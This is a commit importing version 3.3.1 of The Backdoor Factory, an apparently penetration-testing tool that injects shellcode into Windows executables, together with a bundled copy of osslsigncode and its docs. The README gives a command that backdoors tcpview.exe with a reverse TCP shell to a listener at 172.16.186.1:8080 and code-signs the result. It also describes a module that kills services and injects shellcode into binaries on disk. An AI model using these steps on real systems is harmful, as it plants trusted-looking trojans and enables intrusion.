Commit 15421d63 authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 3.3.1

parent 375791a9
......@@ -56,8 +56,12 @@ See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki
sudo pip install capstone
Pefile, most recent:
https://code.google.com/p/pefile/
https://code.google.com/p/pefile/
osslsigncode (included in repo):
http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/
Kali Install:
......@@ -218,7 +222,40 @@ Sample Usage:
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.
---
###PEcodeSigning
BDF can sign PE files if you have a codesigning cert. It uses osslsigncode.
Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post:
http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html
Put your private key password in a file (gasp) as so (exactly as so):
echo -n yourpassword > certs/passFile.txt
Name your certs EXACTLY as follows:
signingCert.cer => certs/signingCert.cer
signingPrivateKey.pem => certs/signingPrivateKey.pem
Your certs/ directory should look excatly as so:
certs
├── passFile.txt
├── signingPrivateKey.pem
└── signingCert.cer
Enable PE Code Signing with the -C floag as so:
./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic -C
On successful run you should see this line in BDF output:
[*] Code Signing Succeeded
---
###Hunt and backdoor: Injector | Windows Only
The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.
......@@ -229,6 +266,14 @@ Sample Usage:
###Changelog
####12/20/2015
* Added directory paths to BDF to find certs directory.
####12/18/2015
* Added PE codesiging support. You must provide your own codesigning cert. See here: https://github.com/secretsquirrel/the-backdoor-factory#pecodesigning
####11/17/2015
* Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
Version: 3.2.4
Version: 3.3.1
"""
author = """\
......@@ -282,6 +282,10 @@ class bdfMain():
"by calling this flag it will be put in a code cave. This can cause bianry "
"failure is some cases. Test on target binaries first."
)
parser.add_option("-C","--code_sign", dest="CODE_SIGN", default=False, action="store_true",
help="For those with codesigning certs wishing to sign PE binaries only. "
"Name your signing key and private key signingcert.cer and signingPrivateKey.pem "
"repectively in the certs directory it's up to you to obtain signing certs.")
(options, args) = parser.parse_args()
......@@ -307,7 +311,7 @@ class bdfMain():
print choice(menu)
print author
print version
time.sleep(1)
time.sleep(.5)
else:
print "\t Backdoor Factory"
print author
......@@ -442,7 +446,8 @@ class bdfMain():
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE
options.IDT_IN_CAVE,
options.CODE_SIGN,
)
supported_file.OUTPUT = None
supported_file.output_options()
......@@ -518,7 +523,8 @@ class bdfMain():
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE
options.IDT_IN_CAVE,
options.CODE_SIGN,
)
supported_file.injector()
sys.exit()
......@@ -556,7 +562,8 @@ class bdfMain():
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE
options.IDT_IN_CAVE,
options.CODE_SIGN,
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
......
# Ignore everything in this directory
*
# Except this file
!.gitignore
......@@ -16,6 +16,15 @@ uname -a | grep -i kali &> /dev/null
if [ $? -eq 0 ]; then
apt-get update
apt-get install -y python-capstone
echo '[*] Install osslsigncode'
cd osslsigncode
./autogen.sh
./configure
make
make install
cd ..
#install appack
uname -a | grep -i "armv" &> /dev/null
if [ $? -ne 0 ]; then
......@@ -44,6 +53,15 @@ if [ $? -eq 0 ]; then
echo '[!!!!] or install pip and retry'
echo ""
fi
echo '[*] Install osslsigncode'
cd osslsigncode
./autogen.sh
./configure
make
make install
cd ..
uname -a | grep -i "armv" &> /dev/null
if [ $? -ne 0 ]; then
echo "[*] installing appack for onionduke"
......@@ -62,6 +80,15 @@ fi
uname -a | grep -i Darwin &> /dev/null
if [ $? -eq 0 ]; then
pip install pefile
echo '[*] Install osslsigncode'
cd osslsigncode
./autogen.sh
./configure
make
make install
cd ..
cd ./aPLib/example/
clang -c -I../lib/macho64 -Wall -O2 -o appack.o appack.c -v
clang -Wall -O2 -o appack appack.o ../lib/macho64/aplib.a -v
......
.deps
Makefile
Makefile.in
aclocal.m4
autom4te.cache/
compile
config.h
config.h.in
config.h.in~
config.log
config.status
configure
depcomp
install-sh
missing
osslsigncode
osslsigncode.o
stamp-h1
.#*#
.*.bak
.*.orig
.*.rej
.*~
#*#
*.bak
*.d
*.def
*.dll
*.exe
*.la
*.lib
*.lo
*.orig
*.pdb
*.rej
*.u
*.rc
*.pc
*~
*.gz
*.bz2
This diff is collapsed.
=== 1.8 (2015-xx-xx)
- add support for pkcs11-based hardware tokens
(Patch from Leif Johansson)
- improved error reporting of timestamping errors
(Patch from Carlo Teubner)
=== 1.7.1 (2014-07-11)
- MSI: added -add-msi-dse option
(Patch from Mikkel Krautz)
- MSI: fix build when GSF_CAN_READ_MSI_METADATA defined
(Patch from Mikkel Krautz)
=== 1.7 (2014-07-10)
- add support for nested signatures
(Patch from Mikkel Krautz)
- fix compilation problem with OpenSSL < 1.0.0
- added OpenSSL linkage exception to license
=== 1.6 (2014-01-21)
- add support for reading password from file
- add support for asking for password (on systems that
provide support for it)
- add support for compiling and running on Windows
(Patch from Heiko Hund)
- fix compilation without curl
(Fix from Heiko Hund)
- added support for giving multiple timestamp servers
as arguments (first one that succeeds will be used)
- signatures on hierarchical MSI files were broken
(Fix from Mikkel Krautz)
- MSI: Add support for MsiDigitalSignatureEx signature
(Patch from Mikkel Krautz)
- add support for adding additional/cross certificates
through -ac option
(Thanks to Lars Munch for idea + testing)
- MSI: Add support for signature extract/remove/verify
(Patches from Mikkel Krautz)
- PE/MSI: Implement -require-leaf-hash for verify.
(Patch from Mikkel Krautz)
=== 1.5.2 (2013-03-13)
- added support for signing with SHA-384 and SHA-512
- added support for page hashing (-ph option)
=== 1.5.1 (2013-03-12)
- forgot to bump version number...
=== 1.5 (2013-03-12)
- added support for signing MSI files (patch from Marc-André Lureau)
- calculate correct PE checksum instead of setting it to 0
(patch from Roland Schwingel)
- added support for RFC3161 timestamping (-ts option)
- added support for extracting/removing/verifying signature on PE files
- fixed problem with not being able to decode timestamps with no newlines
- added stricter checks for PE file validity
- added support for reading keys from PVK files (requires OpenSSL 1.0.0 or later)
- added support for reading certificates from PEM files
- renamed program option: -spc to -certs (old option name still valid)
=== 1.4 (2011-08-12)
- improved build system (patch from Alon Bar-Lev)
- support reading cert+key from PKCS12 file (patch from Alon Bar-Lev)
- support reading key from PEM file
- added support for sha1/sha256 - default hash is now sha1
- added flag for commercial signing (default is individual)
=== 1.3.1 (2009-08-07)
- support signing of 64-bit executables (fix from Paul Kendall)
=== 1.3 (2008-01-31)
- fixed padding problem (fix from Ryan Rubley)
- allow signing of already signed files (fix from Ryan Rubley)
- added Ryan Rubley's PVK-to-DER guide into the README
=== 1.2 (2005-01-21)
- autoconf:ed (Thanks to Roy Keene)
- added documentation
- don't override PKCS7_get_signed_attribute, it wasn't
actually needed, it was me being confused.
- compiles without curl, which means no timestamping
- version number output
=== 1.1 (2005-01-19)
- Initial release
/*
OpenSSL based Authenticode signing for PE/MSI/Java CAB files.
Copyright (C) 2005-2014 Per Allansson <pallansson@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
In addition, as a special exception, the copyright holders give
permission to link the code of portions of this program with the
OpenSSL library under certain conditions as described in each
individual source file, and distribute linked combinations
including the two.
You must obey the GNU General Public License in all respects
for all of the code used other than OpenSSL. If you modify
file(s) with this exception, you may extend this exception to your
version of the file(s), but you are not obligated to do so. If you
do not wish to do so, delete this exception statement from your
version. If you delete this exception statement from all source
files in the program, then also delete it here.
*/
AUTOMAKE_OPTIONS = foreign 1.10
MAINTAINERCLEANFILES = \
config.log config.status \
$(srcdir)/Makefile.in \
$(srcdir)/config.h.in $(srcdir)/config.h.in~ $(srcdir)/configure \
$(srcdir)/install-sh $(srcdir)/ltmain.sh $(srcdir)/missing \
$(srcdir)/depcomp $(srcdir)/aclocal.m4 $(srcdir)/ylwrap \
$(srcdir)/config.guess $(srcdir)/config.sub
EXTRA_DIST = .gitignore
AM_CFLAGS = $(GSF_CFLAGS) $(OPENSSL_CFLAGS) $(OPTIONAL_LIBCURL_CFLAGS)
bin_PROGRAMS = osslsigncode
osslsigncode_SOURCES = osslsigncode.c
osslsigncode_LDADD = $(GSF_LIBS) $(OPENSSL_LIBS) $(OPTIONAL_LIBCURL_LIBS)
osslsigncode
============
== WHAT IS IT?
osslsigncode is a small tool that implements part of the functionality
of the Microsoft tool signtool.exe - more exactly the Authenticode
signing and timestamping. But osslsigncode is based on OpenSSL and cURL,
and thus should be able to compile on most platforms where these exist.
== WHY?
Why not use signtool.exe? Because I don't want to go to a Windows
machine every time I need to sign a binary - I can compile and build
the binaries using Wine on my Linux machine, but I can't sign them
since the signtool.exe makes good use of the CryptoAPI in Windows, and
these APIs aren't (yet?) fully implemented in Wine, so the signtool.exe
tool would fail. And, so, osslsigncode was born.
== WHAT CAN IT DO?
It can sign and timestamp PE (EXE/SYS/DLL/etc), CAB and MSI files. It supports
the equivalent of signtool.exe's "-j javasign.dll -jp low", i.e. add a
valid signature for a CAB file containing Java files. It supports getting
the timestamp through a proxy as well. It also supports signature verification,
removal and extraction.
== INSTALLATION
The usual way:
./configure
make
make install
== USAGE
Before you can sign a file you need a Software Publishing
Certificate (spc) and a corresponding private key.
This article provides a good starting point as to how
to do the signing with the Microsoft signtool.exe:
http://www.matthew-jones.com/articles/codesigning.html
To sign with osslsigncode you need the certificate file mentioned in the
article above, in SPC or PEM format, and you will also need the private
key which must be a key file in DER or PEM format, or if osslsigncode was
compiled against OpenSSL 1.0.0 or later, in PVK format.
To sign a PE or MSI file you can now do:
osslsigncode sign -certs <cert-file> -key <der-key-file> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-in yourapp.exe -out yourapp-signed.exe
or if you are using a PEM or PVK key file with a password together
with a PEM certificate:
osslsigncode sign -certs <cert-file> \
-key <key-file> -pass <key-password> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-in yourapp.exe -out yourapp-signed.exe
or if you want to add a timestamp as well:
osslsigncode sign -certs <cert-file> -key <key-file> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-t http://timestamp.verisign.com/scripts/timstamp.dll \
-in yourapp.exe -out yourapp-signed.exe
You can use a certificate and key stored in a PKCS#12 container:
osslsigncode sign -pkcs12 <pkcs12-file> -pass <pkcs12-password> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-in yourapp.exe -out yourapp-signed.exe
To sign a CAB file containing java class files:
osslsigncode sign -certs <cert-file> -key <key-file> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-jp low \
-in yourapp.cab -out yourapp-signed.cab
Only the 'low' parameter is currently supported.
You can check that the signed file is correct by right-clicking
on it in Windows and choose Properties --> Digital Signatures,
and then choose the signature from the list, and click on
Details. You should then be presented with a dialog that says
amongst other things that "This digital signature is OK".
== CONVERTING FROM PVK TO DER
(This guide was written by Ryan Rubley)
If you've managed to finally find osslsigncode from some searches,
you're most likely going to have a heck of a time getting your SPC
and PVK files into the formats osslsigncode wants.
On the computer where you originally purchased your certificate, you
probably had to use IE to get it. Run IE and select Tools/Internet
Options from the menu, then under the Content tab, click the Certificates
button. Under the Personal tab, select your certificate and click the
Export button. On the second page of the wizard, select the PKCS #7
Certificate (.P7B) format. This file you export as a *.p7b is what you
use instead of your *.spc file. It's the same basic thing, in a different format.
For your PVK file, you will need to download a little utility called
PVK.EXE. This can currently be downloaded at
http://support.globalsign.net/en/objectsign/PVK.zip
Run: pvk -in foo.pvk -nocrypt -out foo.pem
This will convert your PVK file to a PEM file.
From there, you can copy the PEM file to a Linux box, and run:
openssl rsa -outform der -in foo.pem -out foo.der
This will convert your PEM file to a DER file.
You need the *.p7b and *.der files to use osslsigncode, instead of your
*.spc and *.pvk files.
== BUGS, QUESTIONS etc.
Send an email to pallansson@gmail.com
BUT, if you have questions related to generating spc files,
converting between different formats and so on, *please*
spend a few minutes searching on google for your particular
problem since many people probably already have had your
problem and solved it as well.
# This is NOT the official repo for osslsigncode
This project was copied from osslsigncode 1.7.1 to apply some patches for compiling with cygwin and being able to add unauthenticated blobs. The official source for the project is at: http://sourceforge.net/projects/osslsigncode/
## Features added
Adds the argument "-addUnauthenticatedBlob" to add a 1024 byte unauthenticated blob of data to the signature in the same area as the timestamp. This can be used while signing, while timestamping (new `add` command added to allow just time-stamping, after a file has been code signed, or by itself.
Examples:
```
# Example 1. Sign and add blob to unsigned file
osslsigncode sign -addUnauthenticatedBlob -pkcs12 yourcert.pfx -pass your_password -n "Your Company" -i https://YourSite.com/ -in srepp.msi -out srepp_added.msi
```
```
# Example 2. Timestamp and add blob to signed file
osslsigncode.exe add -addUnauthenticatedBlob -t http://timestamp.verisign.com/scripts/timstamp.dll -in your_signed_file.exe -out out.exe
```
```
# Example 3. Add blob to signed and time-stamped file
osslsigncode.exe add -addUnauthenticatedBlob -in your_signed_file.exe -out out.exe
```
```
# Example 4. Sign, timestamp, and add blob
# Technically you can do this, but this would mean your signing certificate
# is on a computer that is connected the Internet,
# which means you are doing something wrong,
# so I'm not going to show how to do that.
```
This technique (but not this project) is used by Dropbox, GoToMeeting, and Summit Route. You can read more about this technique here:
- https://tech.dropbox.com/2014/08/tech-behind-dropboxs-new-user-experience-for-mobile/
- http://blogs.msdn.com/b/ieinternals/archive/2014/09/04/personalizing-installers-using-unauthenticated-data-inside-authenticode-signed-binaries.aspx
## WARNING
The capability this adds can allow you to do dumb things. Be very careful with what you put in the unauthenticated blob, as an attacker could modify this. Do NOT under any circumstances put a URL here that you will use to download an additional file. If you do do that, you would need to check the newly downloaded file is code signed AND that it has been signed with your cert AND that it is the version you expect. You should consider using asymmetrical encryption for the data you put in the blob, such that the executable contains the public key to decrypt the data. Basically, be VERY careful.
## Compiling under cygwin
- Ensure you install the development libraries for openssl, libgfs, and curl.
- Install pkg-config
- Run
```
export SHELLOPTS
set -o igncr
./configure
make
```
## Download
- Compiled binary for cygwin: https://summitroute.com/downloads/osslsigncode.exe
- Compiled binary plus all the required DLL's (self-extracting exe): https://summitroute.com/downloads/osslsigncode-cygwin_files.exe
- signature extraction/removal/verificaton on MSI/CAB files
- improved signature verification on PE files
- clean up / untangle code
- separate timestamping
- man page
- remove mmap usage to increase portability
- tests
- fix other stuff marked 'XXX'
This diff is collapsed.
AC_PREREQ(2.60)
AC_INIT([osslsigncode], [1.7.1], [pallansson@gmail.com])
AC_CONFIG_AUX_DIR([.])
AC_CONFIG_HEADERS([config.h])
AM_INIT_AUTOMAKE
AC_CONFIG_SRCDIR([osslsigncode.c])
dnl Checks for programs.
AC_PROG_CC
AC_USE_SYSTEM_EXTENSIONS
AC_ARG_ENABLE(
[strict],
[AS_HELP_STRING([--enable-strict],[enable strict compile mode @<:@disabled@:>@])],
,
[enable_strict="no"]
)
AC_ARG_ENABLE(
[pedantic],
[AS_HELP_STRING([--enable-pedantic],[enable pedantic compile mode @<:@disabled@:>@])],
,
[enable_pedantic="no"]
)
AC_ARG_WITH(
[curl],
[AS_HELP_STRING([--with-curl],[enable curl @<:@enabled@:>@])],
,
[with_curl="yes"]
)
if test "${enable_pedantic}" = "yes"; then
enable_strict="yes";
CFLAGS="${CFLAGS} -pedantic"
fi
if test "${enable_strict}" = "yes"; then
CFLAGS="${CFLAGS} -Wall -Wextra"
fi
PKG_PROG_PKG_CONFIG
AC_PROG_CPP
AC_PROG_INSTALL
AC_PROG_LN_S
AC_PROG_MKDIR_P
AC_PROG_SED
AC_PROG_MAKE_SET
AC_C_CONST
AC_HEADER_STDC
AC_HEADER_TIME
AC_CHECK_HEADERS(
[sys/mman.h],
[AC_CHECK_FUNC(
[mmap],
[AC_DEFINE(HAVE_MMAP, [1], [Define to 1 if you have mmap])],
[AC_MSG_ERROR([Need mmap to build.])]
)],
[have_mmap=no]
)
AC_CHECK_HEADERS(
[windows.h],
[],
[have_MapViewOfFile=no]
)
AS_IF([test "x$have_mmap$have_MapViewOfFile" = "xnono"],
[AC_MSG_ERROR([Need file mapping function to buid.])])
AC_CHECK_LIB(
[dl],
[dlopen],
[DL_LIBS="-ldl"]
)
AC_CHECK_HEADERS([termios.h])
AC_CHECK_FUNCS(getpass)
AC_ARG_WITH([gsf],
AS_HELP_STRING([--without-gsf], [Ignore presence of libgsf and disable it])
)
AS_IF([test "x$with_gsf" != "xno"],
[PKG_CHECK_MODULES([GSF], [libgsf-1], [have_gsf=yes], [have_gsf=no])],
[have_gsf=no]
)
AS_IF([test "x$have_gsf" = "xyes"],
[AC_DEFINE([WITH_GSF], 1, [Have libgsf?])],
[AS_IF([test "x$with_gsf" = "xyes"],
[AC_MSG_ERROR([libgsf requested but not found])])]
)
PKG_CHECK_MODULES(
[OPENSSL],
[libcrypto >= 0.9.8],
,
[PKG_CHECK_MODULES(
[OPENSSL],
[openssl >= 0.9.8],
,
[AC_CHECK_LIB(
[crypto],
[RSA_verify],
[OPENSSL_LIBS="-lcrypto ${SOCKETS_LIBS} ${DL_LIBS}"],
[AC_MSG_ERROR([OpenSSL 0.9.8 or later is required. http://www.openssl.org/])],
[${DL_LIBS}]
)]
)]
)
PKG_CHECK_MODULES(
[LIBCURL],
[libcurl >= 7.12.0],
,
[AC_CHECK_LIB(
[curl],
[curl_easy_strerror],
[LIBCURL_LIBS="-lcurl"],
,
[${DL_LIBS}]
)]
)
if test "${with_curl}" = "yes"; then
test -z "${LIBCURL_LIBS}" && AC_MSG_ERROR([Curl 7.12.0 or later is required for timestamping support. http://curl.haxx.se/])
OPTIONAL_LIBCURL_CFLAGS="${LIBCURL_CFLAGS}"
OPTIONAL_LIBCURL_LIBS="${LIBCURL_LIBS}"
AC_DEFINE([ENABLE_CURL], [1], [libcurl is enabled])
fi
AC_SUBST([OPTIONAL_LIBCURL_CFLAGS])
AC_SUBST([OPTIONAL_LIBCURL_LIBS])
AC_CONFIG_FILES([Makefile])
AC_OUTPUT
#!/usr/bin/python
import struct
import sys
import hashlib
from pyasn1.type import univ
from pyasn1.codec.ber import encoder, decoder
f = open(sys.argv[1], 'rb')
filehdr = f.read(1024)
if filehdr[0:2] != 'MZ':
print "Not a DOS file."
sys.exit(0)
pepos = struct.unpack('<I', filehdr[60:64])[0]
if filehdr[pepos:pepos+4] != 'PE\0\0':
print "Not a PE file."
sys.exit(0)
pepos += 4
nsections = struct.unpack('<H', filehdr[pepos+2:pepos+4])[0]
print "#sections", nsections
magic = struct.unpack('<H', filehdr[pepos+20:pepos+22])[0]
pe32plus = 0
if magic == 0x20b:
pe32plus = 1
elif magic == 0x10b:
pe32plus = 0
else:
print "Unknown magic", magic
sys.exit(0)
sectoralign = struct.unpack('<I', filehdr[pepos+52:pepos+56])[0]
print "Sector alignment", sectoralign
pos = pepos + 112 + pe32plus*16
nrvas = struct.unpack('<I', filehdr[pos:pos+4])[0]
print "#rvas", nrvas
pos += 4
tpos = pos
rvas = []
for i in range(0, nrvas):
(p1,p2) = struct.unpack('<II', filehdr[pos:pos+8])
rvas.append((p1,p2))
pos += 8
sections = []
for i in range